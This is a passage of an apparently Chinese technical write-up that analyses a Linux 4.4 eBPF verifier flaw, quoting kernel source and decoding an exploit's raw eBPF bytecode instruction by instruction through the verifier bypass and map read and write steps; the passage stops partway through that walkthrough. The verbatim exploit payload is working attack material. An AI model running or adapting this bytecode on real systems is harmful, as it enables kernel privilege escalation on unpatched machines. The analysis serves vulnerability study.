101
102
103
104
105
106
107
108
109
110
111
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L1192
static int check_cond_jmp_op(struct verifier_env *env,
struct bpf_insn *insn, int *insn_idx)
{
struct reg_state *regs = env->cur_state.regs;
struct verifier_state *other_branch;
u8 opcode = BPF_OP(insn->code);
int err;

if (opcode > BPF_EXIT) {
verbose("invalid BPF_JMP opcode %x\n", opcode);
return -EINVAL;
}

if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0) {
verbose("BPF_JMP uses reserved fields\n");
return -EINVAL;
}

/* check src1 operand */
err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;

if (is_pointer_value(env, insn->src_reg)) {
verbose("R%d pointer comparison prohibited\n",
insn->src_reg);
return -EACCES;
}
} else {
if (insn->src_reg != BPF_REG_0) {
verbose("BPF_JMP uses reserved fields\n");
return -EINVAL;
}
}

/* check src2 operand */
err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
if (err)
return err;

/* detect if R == 0 where R was initialized to zero earlier */
//跳转是BPF_JEQ或BPF_JNE跳转,且目的寄存器为立即数
if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE) &&
regs[insn->dst_reg].type == CONST_IMM &&
regs[insn->dst_reg].imm == insn->imm) {
//如果指令中的imm与目的寄存器的imm相同,则直接进行跳转
if (opcode == BPF_JEQ) {
/* if (imm == imm) goto pc+off;
* only follow the goto, ignore fall-through
*/
*insn_idx += insn->off;
return 0;
} else {
/* if (imm != imm) goto pc+off;
* only follow fall-through branch, since
* that's where the program will go
*/
return 0;
}
}

//将符合跳转条件的跳转分支insn->off + 1压入临时栈,作为另外一条分支
other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
if (!other_branch)
return -EFAULT;

/* detect if R == 0 where R is returned value from bpf_map_lookup_elem() */
if (BPF_SRC(insn->code) == BPF_K &&
insn->imm == 0 && (opcode == BPF_JEQ ||
opcode == BPF_JNE) &&
regs[insn->dst_reg].type == PTR_TO_MAP_VALUE_OR_NULL) {
if (opcode == BPF_JEQ) {
/* next fallthrough insn can access memory via
* this register
*/
regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
/* branch targer cannot access it, since reg == 0 */
other_branch->regs[insn->dst_reg].type = CONST_IMM;
other_branch->regs[insn->dst_reg].imm = 0;
} else {
other_branch->regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = 0;
}
} else if (is_pointer_value(env, insn->dst_reg)) {
verbose("R%d pointer comparison prohibited\n", insn->dst_reg);
return -EACCES;
} else if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE)) {

if (opcode == BPF_JEQ) {
/* detect if (R == imm) goto
* and in the target state recognize that R = imm
*/
other_branch->regs[insn->dst_reg].type = CONST_IMM;
other_branch->regs[insn->dst_reg].imm = insn->imm;
} else {
/* detect if (R != imm) goto
* and in the fall-through state recognize that R = imm
*/
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm;
}
}
if (log_level)
print_verifier_state(env);
return 0;
}

BPF_EXIT

继续模拟执行分支A中的指令,当指令是BPF_EXIT指令时,,会执行do_check函数中process_bpf_exit中的逻辑,调用pop_stack检查栈中是否还有未检查的指令,如果有则将临时栈中的指令弹出继续模拟执行执行for循环中的检查逻辑;如果env->head == NULL则说明eBPF程序中BPF_EXIT是最后一条指令,所有指令检查完毕,函数返回-1,insn_idx<0跳出for循环,do_check模拟执行结束。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
//do_check
process_bpf_exit:
insn_idx = pop_stack(env, &prev_insn_idx);
if (insn_idx < 0) {
break;
} else {
do_print_state = true;
continue;
}

//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L424
static int pop_stack(struct verifier_env *env, int *prev_insn_idx)
{
struct verifier_stack_elem *elem;
int insn_idx;

if (env->head == NULL)
return -1;

memcpy(&env->cur_state, &env->head->st, sizeof(env->cur_state));
insn_idx = env->head->insn_idx;
if (prev_insn_idx)
*prev_insn_idx = env->head->prev_insn_idx;
elem = env->head->next;
kfree(env->head);
env->head = elem;
env->stack_size--;
return insn_idx;
}

__bpf_prog_run真正执行

当do_check检查结束后,就完成了eBPF的verifier机制的两轮检查,eBPF代码可以真正执行,真正执行调用 __bpf_prog_run函数,函数维护了一个jumptable跳转表,根据insn->code的类型跳转到不同的逻辑去执行代码。这个函数中有一个寄存器变量regs,它的类型是u64,即64位下的无符号整数类型。函数中涉及到的DST,SRC以及IMM类型如下,可以看到DST和SRC来源于regs,类型为u64,IMM来自类型为bpf_insn的insn,类型为s32。

1
2
3
4
/* Named registers */
#define DST regs[insn->dst_reg]
#define SRC regs[insn->src_reg]
#define IMM insn->imm

当出现赋值语句时,以前面的BPF_MOV指令为例,当执行ALU_MOV_K时,会将IMM由insn->imm(s32)有符号整型转成32位的unsigned int类型;当执行ALU64_MOV_K时,会将insn->imm(s32)有符号整型扩展为64位的unsigned int类型。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/core.c#L195
static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
{
u64 stack[MAX_BPF_STACK / sizeof(u64)];
u64 regs[MAX_BPF_REG], tmp;
static const void *jumptable[256] = {
[0 ... 255] = &&default_label,
/* Now overwrite non-defaults ... */
/* 32 bit ALU operations */
... ...
};
u32 tail_call_cnt = 0;
void *ptr;
int off;

#define CONT ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
ARG1 = (u64) (unsigned long) ctx;

/* Registers used in classic BPF programs need to be reset first. */
regs[BPF_REG_A] = 0;
regs[BPF_REG_X] = 0;

select_insn:
goto *jumptable[insn->code];

/* ALU */
#define ALU(OPCODE, OP) \
... ...

ALU(ADD, +)
ALU(SUB, -)
ALU(AND, &)
ALU(OR, |)
ALU(LSH, <<)
ALU(RSH, >>)
ALU(XOR, ^)
ALU(MUL, *)
#undef ALU
... ...
ALU_MOV_X:
DST = (u32) SRC;
CONT;
ALU_MOV_K:
DST = (u32) IMM;
CONT;
ALU64_MOV_X:
DST = SRC;
CONT;
ALU64_MOV_K:
DST = IMM;
CONT;
... ...

既然DST和IMM类型不一致,处理类型为BPF_JMP的指令也存在问题,当指令为JMP_JEQ_K时,会比较DST和IMM的数值是否相等,如果相等,则执行跳转分支insn += insn->off;同样在JMP_JNE_K中,当DST != IMM时,会执行跳转分支insn += insn->off。那这就存在一个问题,在模拟执行do_check的check_cond_jmp_op函数中,当指令为BPF_JNE或BPF_JEQ且目的操作数是imm时,会首先检查insn->imm和目的寄存器的imm是否相等,如果相等则函数认为不相等的分支不会执行,函数直接跳转到pc+off处继续执行检查逻辑,并没有将不相等的分支压入栈中,不相等的这一分支就直接越过了模拟执行的检查,因为函数认为这一分支根本不会执行到,只有在不确定条件跳转时才会先检查分支A,将分支B压入栈中,分支A执行到BPF_EXIT,再弹出分支B继续模拟执行。但是在真正执行时,目标寄存器DST的类型是u64,而IMM的类型是s32,当DST和IMM进行比较时,imm会由s32先符号扩展为s64,然后再由s64转换为u64,如果IMM是负数,转换后会曲解IMM的值,从而造成DST和IMM不相等,逃避检查的不相等的分支可以得到执行,而且它顺利通过了do_check中的检查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/core.c#L473
/* JMP */
JMP_JA:
insn += insn->off;
CONT;
JMP_JEQ_X:
if (DST == SRC) {
insn += insn->off;
CONT_JMP;
}
CONT;
JMP_JEQ_K:
if (DST == IMM) { //here
insn += insn->off;
CONT_JMP;
}
CONT;
JMP_JNE_X:
if (DST != SRC) {
insn += insn->off;
CONT_JMP;
}
CONT;
JMP_JNE_K:
if (DST != IMM) { //here
insn += insn->off;
CONT_JMP;
}
CONT;
JMP_JGT_X:
if (DST > SRC) {
insn += insn->off;
CONT_JMP;
}
CONT;
... ...

CONT;
JMP_EXIT:
return BPF_R0;
... ...

default_label:
/* If we ever reach this, we have a bug somewhere. */
WARN_RATELIMIT(1, "unknown opcode %02x\n", insn->code);
return 0;
}

利用过程

指令解码

首先看exp中关键的prog数组,将其转化为eBPF指令,每条指令的长度为8个字节:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260


prog = ["\xb4\x09\x00\x00\xff\xff\xff\xff",
"\x55\x09\x02\x00\xff\xff\xff\xff",
"\xb7\x00\x00\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x18\x19\x00\x00\x03\x00\x00\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00",
"\xbf\x91\x00\x00\x00\x00\x00\x00",
"\xbf\xa2\x00\x00\x00\x00\x00\x00",
"\x07\x02\x00\x00\xfc\xff\xff\xff",
"\x62\x0a\xfc\xff\x00\x00\x00\x00",
"\x85\x00\x00\x00\x01\x00\x00\x00",
"\x55\x00\x01\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x79\x06\x00\x00\x00\x00\x00\x00",
"\xbf\x91\x00\x00\x00\x00\x00\x00",
"\xbf\xa2\x00\x00\x00\x00\x00\x00",
"\x07\x02\x00\x00\xfc\xff\xff\xff",
"\x62\x0a\xfc\xff\x01\x00\x00\x00",
"\x85\x00\x00\x00\x01\x00\x00\x00",
"\x55\x00\x01\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x79\x07\x00\x00\x00\x00\x00\x00",
"\xbf\x91\x00\x00\x00\x00\x00\x00",
"\xbf\xa2\x00\x00\x00\x00\x00\x00",
"\x07\x02\x00\x00\xfc\xff\xff\xff",
"\x62\x0a\xfc\xff\x02\x00\x00\x00",
"\x85\x00\x00\x00\x01\x00\x00\x00",
"\x55\x00\x01\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x79\x08\x00\x00\x00\x00\x00\x00",
"\xbf\x02\x00\x00\x00\x00\x00\x00",
"\xb7\x00\x00\x00\x00\x00\x00\x00",
"\x55\x06\x03\x00\x00\x00\x00\x00",
"\x79\x73\x00\x00\x00\x00\x00\x00",
"\x7b\x32\x00\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x55\x06\x02\x00\x01\x00\x00\x00",
"\x7b\xa2\x00\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x7b\x87\x00\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00"]

#define BPF_CLASS(code) ((code) & 0x07)
BPF_LD = 0x00
BPF_LDX = 0x01
BPF_ST = 0x02
BPF_STX = 0x03
BPF_ALU = 0x04
BPF_JMP = 0x05
BPF_RET = 0x06
BPF_MISC = 0x07

#define BPF_SIZE(code) ((code) & 0x18)
BPF_W = 0x00
BPF_H = 0x08
BPF_B = 0x10

#define BPF_MODE(code) ((code) & 0xe0)
BPF_IMM = 0x00
BPF_ABS = 0x20
BPF_IND = 0x40
BPF_MEM = 0x60
BPF_LEN = 0x80
BPF_MSH = 0xa0


#BPF_OP(code) ((code) & 0xf0)
BPF_ADD = 0x00
BPF_SUB = 0x10
BPF_MUL = 0x20
BPF_DIV = 0x30
BPF_OR = 0x40
BPF_AND = 0x50
BPF_LSH = 0x60
BPF_RSH = 0x70
BPF_NEG = 0x80
BPF_MOD = 0x90
BPF_XOR = 0xa0

BPF_JA = 0x00
BPF_JEQ = 0x10
BPF_JGT = 0x20
BPF_JGE = 0x30
BPF_JSET = 0x40

#define BPF_SRC(code) ((code) & 0x08)
BPF_K = 0x00
BPF_X = 0x08

#/* instruction classes */
BPF_ALU64 = 0x07 #/* alu mode in double word width */

#/* ld/ldx fields */
BPF_DW = 0x18 #/* double word */
BPF_XADD = 0xc0 #/* exclusive add */

#/* alu/jmp fields */
BPF_MOV = 0xb0 #/* mov reg to reg */
BPF_ARSH = 0xc0 #/* sign extending arithmetic shift right */

#/* change endianness of a register */
BPF_END = 0xd0 #/* flags for endianness conversion: */
BPF_TO_LE = 0x00 #/* convert to little-endian */
BPF_TO_BE = 0x08 #/* convert to big-endian */

BPF_JNE = 0x50 #/* jump != */
BPF_JSGT = 0x60 #/* SGT is signed '>', GT in x86 */
BPF_JSGE = 0x70 #/* SGE is signed '>=', GE in x86 */
BPF_CALL = 0x80 #/* function call */
BPF_EXIT = 0x90 #/* function return */

BPF_PSEUDO_MAP_FD = 1

opcode = []
for i in range(256):
opcode.append("")

opcode[BPF_ALU | BPF_ADD | BPF_X] = "ALU_ADD_X"
opcode[BPF_ALU | BPF_ADD | BPF_K] = "ALU_ADD_K"
opcode[BPF_ALU | BPF_SUB | BPF_X] = "ALU_SUB_X"
opcode[BPF_ALU | BPF_SUB | BPF_K] = "ALU_SUB_K"
opcode[BPF_ALU | BPF_AND | BPF_X] = "ALU_AND_X"
opcode[BPF_ALU | BPF_AND | BPF_K] = "ALU_AND_K"
opcode[BPF_ALU | BPF_OR | BPF_X] = "ALU_OR_X"
opcode[BPF_ALU | BPF_OR | BPF_K] = "ALU_OR_K"
opcode[BPF_ALU | BPF_LSH | BPF_X] = "ALU_LSH_X"
opcode[BPF_ALU | BPF_LSH | BPF_K] = "ALU_LSH_K"
opcode[BPF_ALU | BPF_RSH | BPF_X] = "ALU_RSH_X"
opcode[BPF_ALU | BPF_RSH | BPF_K] = "ALU_RSH_K"
opcode[BPF_ALU | BPF_XOR | BPF_X] = "ALU_XOR_X"
opcode[BPF_ALU | BPF_XOR | BPF_K] = "ALU_XOR_K"
opcode[BPF_ALU | BPF_MUL | BPF_X] = "ALU_MUL_X"
opcode[BPF_ALU | BPF_MUL | BPF_K] = "ALU_MUL_K"
opcode[BPF_ALU | BPF_MOV | BPF_X] = "ALU_MOV_X"
opcode[BPF_ALU | BPF_MOV | BPF_K] = "ALU_MOV_K"
opcode[BPF_ALU | BPF_DIV | BPF_X] = "ALU_DIV_X"
opcode[BPF_ALU | BPF_DIV | BPF_K] = "ALU_DIV_K"
opcode[BPF_ALU | BPF_MOD | BPF_X] = "ALU_MOD_X"
opcode[BPF_ALU | BPF_MOD | BPF_K] = "ALU_MOD_K"
opcode[BPF_ALU | BPF_NEG] = "ALU_NEG"
opcode[BPF_ALU | BPF_END | BPF_TO_BE] = "ALU_END_TO_BE"
opcode[BPF_ALU | BPF_END | BPF_TO_LE] = "ALU_END_TO_LE"
#/* 64 bit ALU operations */
opcode[BPF_ALU64 | BPF_ADD | BPF_X] = "ALU64_ADD_X"
opcode[BPF_ALU64 | BPF_ADD | BPF_K] = "ALU64_ADD_K"
opcode[BPF_ALU64 | BPF_SUB | BPF_X] = "ALU64_SUB_X"
opcode[BPF_ALU64 | BPF_SUB | BPF_K] = "ALU64_SUB_K"
opcode[BPF_ALU64 | BPF_AND | BPF_X] = "ALU64_AND_X"
opcode[BPF_ALU64 | BPF_AND | BPF_K] = "ALU64_AND_K"
opcode[BPF_ALU64 | BPF_OR | BPF_X] = "ALU64_OR_X"
opcode[BPF_ALU64 | BPF_OR | BPF_K] = "ALU64_OR_K"
opcode[BPF_ALU64 | BPF_LSH | BPF_X] = "ALU64_LSH_X"
opcode[BPF_ALU64 | BPF_LSH | BPF_K] = "ALU64_LSH_K"
opcode[BPF_ALU64 | BPF_RSH | BPF_X] = "ALU64_RSH_X"
opcode[BPF_ALU64 | BPF_RSH | BPF_K] = "ALU64_RSH_K"
opcode[BPF_ALU64 | BPF_XOR | BPF_X] = "ALU64_XOR_X"
opcode[BPF_ALU64 | BPF_XOR | BPF_K] = "ALU64_XOR_K"
opcode[BPF_ALU64 | BPF_MUL | BPF_X] = "ALU64_MUL_X"
opcode[BPF_ALU64 | BPF_MUL | BPF_K] = "ALU64_MUL_K"
opcode[BPF_ALU64 | BPF_MOV | BPF_X] = "ALU64_MOV_X"
opcode[BPF_ALU64 | BPF_MOV | BPF_K] = "ALU64_MOV_K"
opcode[BPF_ALU64 | BPF_ARSH | BPF_X] = "ALU64_ARSH_X"
opcode[BPF_ALU64 | BPF_ARSH | BPF_K] = "ALU64_ARSH_K"
opcode[BPF_ALU64 | BPF_DIV | BPF_X] = "ALU64_DIV_X"
opcode[BPF_ALU64 | BPF_DIV | BPF_K] = "ALU64_DIV_K"
opcode[BPF_ALU64 | BPF_MOD | BPF_X] = "ALU64_MOD_X"
opcode[BPF_ALU64 | BPF_MOD | BPF_K] = "ALU64_MOD_K"
opcode[BPF_ALU64 | BPF_NEG] = "ALU64_NEG"
#/* Call instruction */
opcode[BPF_JMP | BPF_CALL] = "JMP_CALL"
opcode[BPF_JMP | BPF_CALL | BPF_X] = "JMP_TAIL_CALL"
#/* Jumps */
opcode[BPF_JMP | BPF_JA] = "JMP_JA"
opcode[BPF_JMP | BPF_JEQ | BPF_X] = "JMP_JEQ_X"
opcode[BPF_JMP | BPF_JEQ | BPF_K] = "JMP_JEQ_K"
opcode[BPF_JMP | BPF_JNE | BPF_X] = "JMP_JNE_X"
opcode[BPF_JMP | BPF_JNE | BPF_K] = "JMP_JNE_K"
opcode[BPF_JMP | BPF_JGT | BPF_X] = "JMP_JGT_X"
opcode[BPF_JMP | BPF_JGT | BPF_K] = "JMP_JGT_K"
opcode[BPF_JMP | BPF_JGE | BPF_X] = "JMP_JGE_X"
opcode[BPF_JMP | BPF_JGE | BPF_K] = "JMP_JGE_K"
opcode[BPF_JMP | BPF_JSGT | BPF_X] = "JMP_JSGT_X"
opcode[BPF_JMP | BPF_JSGT | BPF_K] = "JMP_JSGT_K"
opcode[BPF_JMP | BPF_JSGE | BPF_X] = "JMP_JSGE_X"
opcode[BPF_JMP | BPF_JSGE | BPF_K] = "JMP_JSGE_K"
opcode[BPF_JMP | BPF_JSET | BPF_X] = "JMP_JSET_X"
opcode[BPF_JMP | BPF_JSET | BPF_K] = "JMP_JSET_K"
#/* Program return */
opcode[BPF_JMP | BPF_EXIT] = "JMP_EXIT"
#/* Store instructions */
opcode[BPF_STX | BPF_MEM | BPF_B] = "STX_MEM_B"
opcode[BPF_STX | BPF_MEM | BPF_H] = "STX_MEM_H"
opcode[BPF_STX | BPF_MEM | BPF_W] = "STX_MEM_W"
opcode[BPF_STX | BPF_MEM | BPF_DW] = "STX_MEM_DW"
opcode[BPF_STX | BPF_XADD | BPF_W] = "STX_XADD_W"
opcode[BPF_STX | BPF_XADD | BPF_DW] = "STX_XADD_DW"
opcode[BPF_ST | BPF_MEM | BPF_B] = "ST_MEM_B"
opcode[BPF_ST | BPF_MEM | BPF_H] = "ST_MEM_H"
opcode[BPF_ST | BPF_MEM | BPF_W] = "ST_MEM_W"
opcode[BPF_ST | BPF_MEM | BPF_DW] = "ST_MEM_DW"
#/* Load instructions */
opcode[BPF_LDX | BPF_MEM | BPF_B] = "LDX_MEM_B"
opcode[BPF_LDX | BPF_MEM | BPF_H] = "LDX_MEM_H"
opcode[BPF_LDX | BPF_MEM | BPF_W] = "LDX_MEM_W"
opcode[BPF_LDX | BPF_MEM | BPF_DW] = "LDX_MEM_DW"
opcode[BPF_LD | BPF_ABS | BPF_W] = "LD_ABS_W"
opcode[BPF_LD | BPF_ABS | BPF_H] = "LD_ABS_H"
opcode[BPF_LD | BPF_ABS | BPF_B] = "LD_ABS_B"
opcode[BPF_LD | BPF_IND | BPF_W] = "LD_IND_W"
opcode[BPF_LD | BPF_IND | BPF_H] = "LD_IND_H"
opcode[BPF_LD | BPF_IND | BPF_B] = "LD_IND_B"
opcode[BPF_LD | BPF_IMM | BPF_DW] = "LD_IMM_DW"




'''
struct bpf_insn {
__u8 code; /* opcode */
__u8 dst_reg:4; /* dest register */
__u8 src_reg:4; /* source register */
__s16 off; /* signed offset */
__s32 imm; /* signed immediate constant */
};
'''
regs = ["BPF_REG_0","BPF_REG_1","BPF_REG_2","BPF_REG_3","BPF_REG_4",
"BPF_REG_5","BPF_REG_6","BPF_REG_7","BPF_REG_8","BPF_REG_9","BPF_REG_10"]

def u32(imm):
if(len(imm) != 4):
imm = imm + '\x00'*(4-len(imm))
imm_num = ord(imm[0]) + (ord(imm[1]) << 8) + (ord(imm[2]) << 16) + (ord(imm[3]) << 24)
return imm_num

def u16(imm):
if(len(imm) != 2):
imm = imm + '\x00'*(2-len(imm))
imm_num = ord(imm[0]) + (ord(imm[1]) << 8)
return imm_num

for i in range(len(prog)):
ins = prog[i].strip()
code = opcode[ord(ins[0])]
src_reg = regs[(ord(ins[1]) >> 4) & 0xf]
dst_reg = regs[ord(ins[1]) & 0x0f]
off = u16(ins[2:4])
imm = ins[4:]
imm = u32(imm)

if code == "LD_IMM_DW" and ((ord(ins[1]) >> 4) & 0xf) == BPF_PSEUDO_MAP_FD:
if i != len(prog) - 1 and prog[i+1] == "\x00\x00\x00\x00\x00\x00\x00\x00":
code = "LD_MAP_FD"
insn = code + '(' + dst_reg + ', ' + 'map_addr' + ')'
elif ins == "\x00\x00\x00\x00\x00\x00\x00\x00":
insn = "bpf_map_padding"
else:
insn = code + '('+ dst_reg + ', ' + src_reg + ', ' + str(hex(off)) + ', ' + str(hex(imm)) + ')'
print("[%d]: %s" %(i,insn))

prog一共有41条指令,脚本对指令[10],[18],[26]的指令类型无法识别,结合exp及其他博客对少数指令进行了修正:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
[0]: ALU_MOV_K(BPF_REG_9, BPF_REG_0, 0x0, 0xffffffff)
[1]: JMP_JNE_K(BPF_REG_9, BPF_REG_0, 0x2, 0xffffffff)
[2]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[3]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[4]: LD_MAP_FD(BPF_REG_9, map_addr)
[5]: bpf_map_padding
[6]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)
[7]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[8]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)
[9]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x0)
[10]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[11]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)
[12]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[13]: LDX_MEM_DW(BPF_REG_6, BPF_REG_0, 0x0, 0x0)
[14]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)
[15]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[16]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)
[17]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x1)
[18]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[19]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)
[20]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[21]: LDX_MEM_DW(BPF_REG_7, BPF_REG_0, 0x0, 0x0)
[22]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)
[23]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[24]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)
[25]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x2)
[26]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[27]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)
[28]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[29]: LDX_MEM_DW(BPF_REG_8, BPF_REG_0, 0x0, 0x0)
[30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0)
[31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0)
[33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0)
[34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0)
[35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1)
[37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0)
[40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)

指令执行过程

绕过check

分析指令[0]~[3],指令[0]将r9赋值为0xffffffff,指令[1]为条件跳转指令,当r9 == 0xffffffff时,继续执行下一条指令,当r9 != 0xffffffff跳转到指令[4]去执行,由于在模拟执行时,r9寄存器在指令[0]时被赋值为0xffffffff,do_check认为r9恒等于0xffffffff,就不会去检查指令[4]以及后面的指令,继续模拟执行指令[2],指令[2]将r0赋值为0,继续模拟执行,指令[3]是BPF_EXIT指令,临时栈中也没有其他分支,do_check检查结束,但其实do_check只检查了4条指令。但是在真正执行时,目的寄存器DST的类型为u64,大小是0x00000000ffffffff,IMM为类型为s32,值为0xffffffff,与DST比较时先进行符号扩展为0xffffffffffffffff,然后被认为是64位的无符号整数0xffffffffffffffff,从而导致DST != IMM,跳转条件成立,跳转到指令[4]去执行。

1
2
3
4
[0]: ALU_MOV_K(BPF_REG_9, BPF_REG_0, 0x0, 0xffffffff)
[1]: JMP_JNE_K(BPF_REG_9, BPF_REG_0, 0x2, 0xffffffff)
[2]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[3]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)

我们可以看到真正执行时DST和IMM的值,在函数__bpf_prog_run中下断点,程序执行至DST与IMM的比较,rbx指向的就是我们的指令1,那我们就可以判断rdx由指令movsxd rdx, dword ptr [rbx + 4]得到,movsxd为符号扩展传送指令,将IMM由s32扩展为u64,IMM也就是rdx的值变为0xffffffffffffffff:
1
那另外一个就是DST的值,DST的值是0x00000000ffffffff,DST不等于IMM,然后程序从本条指令中获取到off,跳转至指令[4]去执行。
2

获取map地址

根据前面对replace_map_fd_with_map_ptr函数的分析,可以知道这里将bpf_map的地址赋值给r9,第五条指令是为了符合LD_MAP_FD的下一条指令的要求。

1
2
[4]: LD_MAP_FD(BPF_REG_9, map_addr) //r9 = map_addr
[5]: bpf_map_padding

获取map[0] ~ map[2]

获取map[0],存储在r6中:

1
2
3
4
5
6
7
8
[6]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)   //r1 = r9,即r1 = map_addr
[7]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10 = rbp
[8]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) //r2 = r2 + 0xfffffffc,即r2 = r2 - 4 = rbp - 4
[9]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x0) //[rbp - 4] = r0
[10]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem) //call
[11]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 != 0): 函数bpf_lookup_elem成功执行,跳转到指令[13]处执行,否则exit(0)
[12]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[13]: LDX_MEM_DW(BPF_REG_6, BPF_REG_0, 0x0, 0x0) //r6 = [r0] = map[0]

获取map[1],存储在r7中:

1
2
3
4
5
6
7
8
